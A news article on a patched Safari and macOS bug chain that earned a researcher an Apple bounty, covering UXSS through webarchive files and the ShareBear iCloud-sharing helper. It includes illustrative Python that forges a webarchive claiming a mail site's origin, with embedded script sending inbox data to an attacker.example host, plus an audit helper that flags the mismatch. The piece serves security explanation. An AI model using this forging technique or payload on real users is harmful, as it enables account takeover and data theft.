A researcher has picked up a $100,500 bounty from Apple after discovering a rather nasty method of gaining control of other people’s Macs. The issue, found by Ryan Pickren in a chain of Safari and macOS bugs, could let a rogue website perform a number of dubious actions on a visitor’s machine.
It begins, as so many attacks do, with a single click.
"Check out my website..."
The attacker starts by steering the victim to a specific website and getting them to click “Open” in a popup. The bug chain then plants a file on the Mac which gives the attacker full control. There’s a peripheral angle, and a browsing angle, to this attack.
First off, the peripheral angle. Falling foul of this one activates the Mac’s webcam and allows an attacker to spy on you. This is, of course, never a good thing in the privacy stakes.
This is actually the second webcam bug found by this researcher. In 2020, Pickren found a zero-day that granted camera access, and Apple fixed it. Turns out there’s always another way to get things done, and this is why webcam covers are, at a minimum, a very good idea.
Secondly, we have the browsing angle. It’s not just possible to hijack the webcam with this one. The attacker could also access and interact with anything open in Safari. Essentially, this is a full takeover of every account you’re logged into, in a suddenly very hostile web browsing experience. Have your email account open? The attacker can access it. Social media pages? Same again. About to comment on a local news story involving a lost kitten and a tree? Buckle up, because what’s posted may not be to your liking.
So how did our intrepid student researcher achieve this?
The mighty power of UXSS (universal cross-site scripting bugs)
The answer is via UXSS: a bug that lets one origin run script in the context of any other origin, not just the one site that is vulnerable. Google regards it as one of the nastier things floating around the exploit realm. As Google puts it:
Bugs leading to UXSS attacks are among the most significant threats for users of any browser. From an attacker perspective, a UXSS exploit may be almost as valuable as a Remote Code Execution (RCE) exploit with the sandbox escape.
If you save a web page locally in Safari, you have the option of saving it as a webarchive file instead of plain HTML. As the writeup states, these files record the web origin that the saved content should be rendered in, and Safari trusts that record when it opens the file. If attackers can get a file of their own making onto the Mac and opened, they can pick the origin themselves, and they’ve as good as reached UXSS nirvana.
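To make that concrete, here is an added example (not code from Pickren’s writeup or from Apple) that builds a minimal Safari webarchive and then reads back the origin it declares. A webarchive is a property list whose WebMainResource dictionary carries the page body (WebResourceData) alongside the URL it was saved from (WebResourceURL), and that URL is what decides the origin the content renders in. The hostnames, the HTML body and the audit helper that compares the declared origin with where the file was actually downloaded from are constructed for illustration.

```python
import plistlib
from urllib.parse import urlsplit


def build_webarchive(claimed_url: str, html: str) -> bytes:
    """Serialise a minimal Safari webarchive (binary plist).

    The key names follow the WebKit webarchive format; the content and the
    claimed URL are whatever the caller supplies. This is exactly why a file
    an attacker authored is dangerous: nothing in the format proves the body
    really came from claimed_url.
    """
    archive = {
        "WebMainResource": {
            "WebResourceData": html.encode("utf-8"),
            "WebResourceMIMEType": "text/html",
            "WebResourceTextEncodingName": "UTF-8",
            "WebResourceURL": claimed_url,
            "WebResourceFrameName": "",
        },
        "WebSubresources": [],
    }
    return plistlib.dumps(archive, fmt=plistlib.FMT_BINARY)


def declared_origin(webarchive_bytes: bytes) -> str:
    """Return the scheme://host[:port] origin the main resource claims."""
    archive = plistlib.loads(webarchive_bytes)
    url = archive["WebMainResource"]["WebResourceURL"]
    parts = urlsplit(url)
    origin = f"{parts.scheme}://{parts.hostname}"
    if parts.port is not None:
        origin += f":{parts.port}"
    return origin


def audit_webarchive(webarchive_bytes: bytes, download_origin: str) -> dict:
    """Compare the origin a webarchive claims with the origin it was fetched from.

    download_origin is assumed to come from the downloader's own records
    (for example a quarantine attribute or proxy log); a mismatch plus inline
    script in the body is the pattern described in the article.
    """
    archive = plistlib.loads(webarchive_bytes)
    body = archive["WebMainResource"]["WebResourceData"].decode("utf-8", "replace")
    claimed = declared_origin(webarchive_bytes)
    return {
        "declared_origin": claimed,
        "download_origin": download_origin,
        "origin_mismatch": claimed != download_origin,
        "has_inline_script": "<script" in body.lower(),
    }


# Constructed sample: a body written by attacker.example that claims to be
# a page from mail.example.com, so Safari would run its script as that origin.
MALICIOUS = build_webarchive(
    "https://mail.example.com/inbox",
    "<html><body><script>fetch('/messages').then(r => r.text())"
    ".then(t => navigator.sendBeacon('https://attacker.example/x', t));"
    "</script></body></html>",
)

# Constructed sample: a page a user genuinely saved from the same site.
BENIGN = build_webarchive(
    "https://news.example.org/kitten-in-tree",
    "<html><body><p>Kitten rescued, tree unharmed.</p></body></html>",
)

if __name__ == "__main__":
    print(audit_webarchive(MALICIOUS, "https://attacker.example"))
    print(audit_webarchive(BENIGN, "https://news.example.org"))
```

The check is only as good as the record of where the file came from; a file that arrived through ShareBear rather than a normal browser download is precisely the case where that record is missing, which is the point of the chain described below.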
The researcher combined this with a trawl through the custom URL schemes that macOS apps register, eventually settling on a component called “ShareBear”.
Sharing is bearing
ShareBear is the macOS helper that leaps into action whenever remote iCloud-shared content needs to be grabbed. Sharing a file through iCloud gives you a public share link; take that link, swap its “https” scheme for “icloud-sharing”, and visiting the result is enough to open ShareBear automatically.
This is where the “Open file” popup mentioned earlier comes into play.
If it’s the first time you’ve seen the popup for that file, hitting “Open” downloads the file and automatically opens it. The popup is then gone forever; the after effects, not so much.
From then on, any website in Safari can launch that file again via ShareBear without a prompt. The creator can alter it however they wish at their end after you said “yes” to opening it, and the changed version is downloaded to the victim’s Mac and launched automatically.
As the discoverer of this technique put it:
Agreed to view my PNG file yesterday? Well today it's an executable binary that will be automatically launched whenever I want.
Apple has already fixed this issue, so you should be safe from oversharing bears and webcam indiscretions.